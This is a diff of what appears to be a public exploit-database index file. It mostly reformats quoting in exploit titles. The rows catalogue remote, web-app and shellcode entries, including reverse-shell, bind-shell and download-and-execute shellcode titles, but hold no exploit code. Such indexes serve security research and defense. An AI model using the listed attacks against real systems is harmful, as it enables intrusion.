35637,platforms/android/remote/35637.py,"WhatsApp 2.11.476 (Android) - Remote Reboot/Crash App (Denial of Service)",2014-12-28,"Daniel Godoy",android,remote,0 -35638,platforms/multiple/remote/35638.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf' 'jdeowpBackButtonProtect' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 -35639,platforms/multiple/remote/35639.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService' 'e1.namespace' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 -35640,platforms/multiple/remote/35640.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService' 'e1.namespace' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 -35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService' 'RENDER_MAFLET' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 -35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService' 'jdemafjasLinkTarget' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35638,platforms/multiple/remote/35638.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf jdeowpBackButtonProtect' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35639,platforms/multiple/remote/35639.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService e1.namespace' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35640,platforms/multiple/remote/35640.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService e1.namespace' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService RENDER_MAFLET' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0 35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution",2014-12-30,drone,windows,remote,0 35660,platforms/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload (Metasploit)",2014-12-31,Metasploit,php,remote,80 @@ -15164,7 +15166,7 @@ id,file,description,date,author,platform,type,port 35898,platforms/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",multiple,remote,0 35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change",2015-01-27,"Todor Donev",hardware,remote,0 35918,platforms/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",multiple,remote,0 -35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 +35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass",2015-01-28,"Jeremy Brown",windows,remote,0 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 @@ -15174,7 +15176,7 @@ id,file,description,date,author,platform,type,port 35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0 35961,platforms/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",hp-ux,remote,0 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ - Cross-Site Request Forgery / HTML Injection",2011-07-18,MustLive,hardware,remote,0 -36004,platforms/multiple/remote/36004.txt,"Skype 5.3 - 'Mobile Phone' Field HTML Injection",2011-08-01,noptrix,multiple,remote,0 +36004,platforms/multiple/remote/36004.txt,"Skype 5.3 - 'Mobile Phone' HTML Injection",2011-08-01,noptrix,multiple,remote,0 36006,platforms/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass",2011-08-02,"Roee Hay",multiple,remote,0 36013,platforms/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,multiple,remote,0 36014,platforms/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure",2015-02-07,"Todor Donev",hardware,remote,0 @@ -15191,7 +15193,7 @@ id,file,description,date,author,platform,type,port 36115,platforms/windows/remote/36115.txt,"Apple QuickTime 7.6.9 - 'QuickTimePlayer.dll' ActiveX Buffer Overflow",2011-09-06,"Ivan Sanchez",windows,remote,0 36124,platforms/php/remote/36124.txt,"jQuery - jui_filter_rules PHP Code Execution",2015-02-19,"Timo Schmid",php,remote,80 36130,platforms/multiple/remote/36130.txt,"Spring Security - HTTP Header Injection",2011-09-09,"David Mas",multiple,remote,0 -36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote,0 +36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote,0 36169,platforms/multiple/remote/36169.rb,"HP Client - Automation Command Injection (Metasploit)",2015-02-24,Metasploit,multiple,remote,3465 36174,platforms/windows/remote/36174.txt,"ServersCheck Monitoring Software 8.8.x - Multiple Vulnerabilities",2011-09-27,Vulnerability-Lab,windows,remote,0 36199,platforms/linux/remote/36199.txt,"Perl 5.x - Digest Module 'Digest->new()' Code Injection",2011-10-02,anonymous,linux,remote,0 @@ -15199,8 +15201,8 @@ id,file,description,date,author,platform,type,port 36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)",2015-02-27,"Ben Turner",windows,remote,3465 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",windows,remote,0 36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Authenticated Command Injection (Metasploit)",2015-03-04,Metasploit,linux,remote,443 -36217,platforms/windows/remote/36217.txt,"GoAhead Web Server 2.18 - 'addgroup.asp' 'group' Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 -36218,platforms/windows/remote/36218.txt,"GoAhead Web Server 2.18 - 'addlimit.asp' 'url' Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 +36217,platforms/windows/remote/36217.txt,"GoAhead Web Server 2.18 - 'addgroup.asp group' Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 +36218,platforms/windows/remote/36218.txt,"GoAhead Web Server 2.18 - 'addlimit.asp url' Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 36219,platforms/windows/remote/36219.txt,"GoAhead Web Server 2.18 - 'adduser.asp' Multiple Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 36235,platforms/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Vulnerabilities",2011-10-14,"Luigi Auriemma",windows,remote,0 36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices - Security Bypass",2011-10-17,"Deral Heiland PercX",multiple,remote,0 @@ -15498,7 +15500,7 @@ id,file,description,date,author,platform,type,port 38818,platforms/multiple/remote/38818.xml,"Openbravo ERP - XML External Entity Information Disclosure",2013-10-30,"Tod Beardsley",multiple,remote,0 38821,platforms/android/remote/38821.py,"Google Android - Signature Verification Security Bypass",2013-11-04,"Jay Freeman",android,remote,0 38825,platforms/multiple/remote/38825.xml,"IBM Cognos Business Intelligence - XML External Entity Information Disclosure",2013-10-11,IBM,multiple,remote,0 -38826,platforms/linux/remote/38826.py,"Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure",2013-12-10,"Mathy Vanhoef",linux,remote,0 +38826,platforms/linux/remote/38826.py,"Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Information Disclosure",2013-12-10,"Mathy Vanhoef",linux,remote,0 38827,platforms/php/remote/38827.txt,"Nagios XI - 'tfPassword' Parameter SQL Injection",2013-12-13,"Denis Andzakovic",php,remote,0 38829,platforms/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass with ROP)",2015-11-30,Knaps,windows,remote,0 36025,platforms/windows/remote/36025.py,"Achat 0.150 beta7 - Buffer Overflow",2015-02-08,"KAhara MAnhara",windows,remote,0 @@ -15527,17 +15529,17 @@ id,file,description,date,author,platform,type,port 39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0 -39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 -39105,platforms/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote,0 +39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi ping_ipaddr' Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 +39105,platforms/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote,0 39104,platforms/multiple/remote/39104.py,"Dassault Systemes Catia - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",multiple,remote,0 -39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 +39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi IPAddr4' Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 39114,platforms/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,multiple,remote,0 39119,platforms/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p (Windows XP/7/10) - Chat Remote Buffer Overflow (SEH)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem - Cross-Site Request Forgery",2014-04-12,"Blessen Thomas",hardware,remote,0 39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrolment",2016-01-12,"Daniel Lawson",hardware,remote,0 39154,platforms/hardware/remote/39154.txt,"COMTREND CT-5361T Router - 'Password.cgi' Cross-Site Request Forgery (Admin Password Manipulation)",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 -39155,platforms/linux/remote/39155.txt,"lxml - 'clean_html' Function Security Bypass",2014-04-15,"Maksim Kochkin",linux,remote,0 +39155,platforms/linux/remote/39155.txt,"lxml - 'clean_html' Security Bypass",2014-04-15,"Maksim Kochkin",linux,remote,0 39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0 39175,platforms/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk - Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,multiple,remote,0 39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 - Authentication Bypass",2014-05-15,jkmac,multiple,remote,0 @@ -15550,8 +15552,8 @@ id,file,description,date,author,platform,type,port 39218,platforms/windows/remote/39218.html,"Trend Micro - node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0 39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0 39224,platforms/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22 -39258,platforms/multiple/remote/39258.txt,"Alfresco - '/proxy' 'endpoint' Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 -39259,platforms/multiple/remote/39259.txt,"Alfresco - '/cmisbrowser' 'url' Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 +39258,platforms/multiple/remote/39258.txt,"Alfresco - '/proxy endpoint' Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 +39259,platforms/multiple/remote/39259.txt,"Alfresco - '/cmisbrowser url' Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 39455,platforms/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,multiple,remote,0 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall - Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote,0 39292,platforms/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 @@ -15559,7 +15561,7 @@ id,file,description,date,author,platform,type,port 39295,platforms/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 / Thunderbird 3.1.20 - Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0 39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers - Information Disclosure",2014-09-15,"Eric Fajardo",hardware,remote,0 39316,platforms/hardware/remote/39316.pl,"Aztech Modem Routers - Session Hijacking",2014-09-15,"Eric Fajardo",hardware,remote,0 -39318,platforms/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Function Password Truncation Security",2014-09-16,"Pichaya Morimoto",multiple,remote,0 +39318,platforms/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Password Truncation Security",2014-09-16,"Pichaya Morimoto",multiple,remote,0 39328,platforms/android/remote/39328.rb,"Google Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,android,remote,5555 39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L - Authenticated Remote Command Execution (Metasploit)",2016-02-10,Metasploit,hardware,remote,0 39439,platforms/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0 @@ -15895,7 +15897,7 @@ id,file,description,date,author,platform,type,port 42952,platforms/windows/remote/42952.py,"ERS Data System 1.8.1 - Java Deserialization",2017-09-21,"West Shepherd",windows,remote,0 42958,platforms/linux/remote/42958.py,"Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution",2017-08-08,"Jared Arave",linux,remote,0 42964,platforms/lin_x86-64/remote/42964.rb,"Rancher Server - Docker Daemon Code Execution (Metasploit)",2017-10-09,Metasploit,lin_x86-64,remote,8080 -42965,platforms/multiple/remote/42965.rb,"OrientDB 2.2.2 - 2.2.22 - Remote Code Execution (Metasploit)",2017-10-09,Metasploit,multiple,remote,2480 +42965,platforms/multiple/remote/42965.rb,"OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)",2017-10-09,Metasploit,multiple,remote,2480 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16182,7 +16184,7 @@ id,file,description,date,author,platform,type,port 13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0 13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0 13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0 -13532,platforms/win_x86/shellcode/13532.asm,"Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,anonymous,win_x86,shellcode,0 +13532,platforms/win_x86/shellcode/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,win_x86,shellcode,0 13533,platforms/win_x86-64/shellcode/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0 13548,platforms/lin_x86/shellcode/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,lin_x86,shellcode,0 13549,platforms/lin_x86/shellcode/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 @@ -16479,7 +16481,7 @@ id,file,description,date,author,platform,type,port 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0 -40128,platforms/linux_crisv32/shellcode/40128.c,"Linux/CRISv32 - Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)",2016-07-20,bashis,linux_crisv32,shellcode,0 +40128,platforms/linux_crisv32/shellcode/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)",2016-07-20,bashis,linux_crisv32,shellcode,0 40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0 40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 @@ -16715,7 +16717,7 @@ id,file,description,date,author,platform,type,port 1236,platforms/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution (Metasploit)",2005-09-27,"Nicolas Gregoire",cgi,webapps,0 1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 - 'msg_send' Parameter SQL Injection",2005-09-28,rgod,php,webapps,0 1240,platforms/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,php,webapps,0 -1241,platforms/php/webapps/1241.php,"Cyphor 0.19 - (board takeover) SQL Injection",2005-10-08,rgod,php,webapps,0 +1241,platforms/php/webapps/1241.php,"Cyphor 0.19 - Board Takeover SQL Injection",2005-10-08,rgod,php,webapps,0 1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,php,webapps,0 1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection",2005-10-10,rgod,php,webapps,0 1250,platforms/php/webapps/1250.php,"w-Agora 4.2.0 - 'quicklist.php' Remote Code Execution",2005-10-14,rgod,php,webapps,0 @@ -17214,7 +17216,7 @@ id,file,description,date,author,platform,type,port 2175,platforms/php/webapps/2175.txt,"WEBInsta CMS 0.3.1 - (templates_dir) Remote File Inclusion",2006-08-12,K-159,php,webapps,0 2177,platforms/php/webapps/2177.txt,"Joomla! Component Webring 1.0 - Remote File Inclusion",2006-08-13,"Mehmet Ince",php,webapps,0 2178,platforms/php/webapps/2178.php,"XMB 1.9.6 Final - 'basename()' Remote Command Execution",2006-08-13,rgod,php,webapps,0 -2181,platforms/php/webapps/2181.pl,"PHPay 2.02 - 'nu_mail.inc.php' 'mail()' Remote Injection",2006-08-14,beford,php,webapps,80 +2181,platforms/php/webapps/2181.pl,"PHPay 2.02 - 'nu_mail.inc.php mail()' Remote Injection",2006-08-14,beford,php,webapps,80 2182,platforms/php/webapps/2182.txt,"Mambo Component MMP 1.2 - Remote File Inclusion",2006-08-14,mdx,php,webapps,0 2183,platforms/php/webapps/2183.txt,"ProjectButler 0.8.4 - (rootdir) Remote File Inclusion",2006-08-14,"the master",php,webapps,0 2184,platforms/php/webapps/2184.txt,"Mambo Component Peoplebook 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps,0 @@ -17460,7 +17462,7 @@ id,file,description,date,author,platform,type,port 2485,platforms/php/webapps/2485.pl,"Cahier de texte 2.0 - 'lire.php' SQL Injection",2006-10-07,s4mi,php,webapps,0 2486,platforms/php/webapps/2486.txt,"phpBB Random User Registration Number 1.0 Mod - Remote File Inclusion",2006-10-07,bd0rk,php,webapps,0 2487,platforms/php/webapps/2487.php,"4Images 1.7.x - 'search.php' SQL Injection",2006-10-08,Synsta,php,webapps,0 -2488,platforms/php/webapps/2488.txt,"PHPMyNews 1.4 - (cfg_include_dir) Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 +2488,platforms/php/webapps/2488.txt,"PHPMyNews 1.4 - 'cfg_include_dir' Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 2489,platforms/php/webapps/2489.pl,"Ciamos CMS 0.9.6b - 'config.php' Remote File Inclusion",2006-10-08,Kacper,php,webapps,0 2490,platforms/php/webapps/2490.txt,"Freenews 1.1 - 'moteur.php' Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 2491,platforms/php/webapps/2491.pl,"PHPPC 1.03 RC1 - '/lib/functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 @@ -17470,7 +17472,7 @@ id,file,description,date,author,platform,type,port 2496,platforms/php/webapps/2496.txt,"WebYep 1.1.9 - 'webyep_sIncludePath' File Inclusion",2006-10-09,the_day,php,webapps,0 2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps,0 2498,platforms/php/webapps/2498.php,"Flatnuke 2.5.8 - 'file()' Privilege Escalation / Code Execution",2006-10-10,rgod,php,webapps,0 -2499,platforms/php/webapps/2499.php,"Flatnuke 2.5.8 - (userlang) Local Inclusion / Delete All Users Exploit",2006-10-10,rgod,php,webapps,0 +2499,platforms/php/webapps/2499.php,"Flatnuke 2.5.8 - 'userlang' Local Inclusion / Delete All Users Exploit",2006-10-10,rgod,php,webapps,0 2500,platforms/php/webapps/2500.pl,"phpMyAgenda 3.1 - 'templates/header.php3' Local File Inclusion",2006-10-10,"Nima Salehi",php,webapps,0 2501,platforms/php/webapps/2501.txt,"TribunaLibre 3.12 Beta - 'ftag.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 2502,platforms/php/webapps/2502.txt,"registroTL - 'main.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 @@ -17855,11 +17857,11 @@ id,file,description,date,author,platform,type,port 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b - (cal_dir) Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - 'admin/uploads.php' Remote Code Execution",2006-12-26,undefined1_,php,webapps,0 -3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - 'plug.inc.php' 'path' Parameter Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 +3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - 'plug.inc.phppath' Parameter Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3026,platforms/php/webapps/3026.txt,"Bubla 1.0.0rc2 - 'bu/process.php' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3027,platforms/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusion",2006-12-27,Mr-m07,php,webapps,0 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Inclusion",2006-12-27,"Mehmet Ince",php,webapps,0 -3029,platforms/php/webapps/3029.php,"Cacti 0.8.6i - 'cmd.php' 'popen()' Remote Injection",2006-12-27,rgod,php,webapps,0 +3029,platforms/php/webapps/3029.php,"Cacti 0.8.6i - 'cmd.php popen()' Remote Injection",2006-12-27,rgod,php,webapps,0 3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - 'faqDsp.asp catcode' SQL Injection",2006-12-28,ajann,asp,webapps,0 3032,platforms/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0 3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 - (Acronym Mod) SQL Injection",2006-12-28,"the master",php,webapps,0 @@ -17880,7 +17882,7 @@ id,file,description,date,author,platform,type,port 3057,platforms/php/webapps/3057.php,"MDForum 2.0.1 - (PNSVlang) Remote Code Execution",2006-12-31,Kacper,php,webapps,0 3059,platforms/php/webapps/3059.txt,"Bubla 0.9.2 - (bu_dir) Multiple Remote File Inclusion",2006-12-31,DeltahackingTEAM,php,webapps,0 3060,platforms/asp/webapps/3060.txt,"RBlog 1.0 - 'admin.mdb' Remote Password Disclosure",2007-01-01,"Aria-Security Team",asp,webapps,0 -3061,platforms/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp' 'id' Parameter SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 +3061,platforms/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp id' Parameter SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 3062,platforms/asp/webapps/3062.txt,"AutoDealer 2.0 - 'detail.asp iPro' SQL Injection",2007-01-01,ajann,asp,webapps,0 3065,platforms/cgi/webapps/3065.txt,"WWWBoard 2.0 - 'passwd.txt' Remote Password Disclosure",2007-01-01,bd0rk,cgi,webapps,0 3066,platforms/asp/webapps/3066.txt,"NewsCMSLite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 @@ -17891,7 +17893,7 @@ id,file,description,date,author,platform,type,port 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0 3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - 'inc/init.inc.php' Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 3081,platforms/asp/webapps/3081.pl,"DigiRez 3.4 - (book_id) SQL Injection",2007-01-04,ajann,asp,webapps,0 -3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php' 'id' Parameter SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 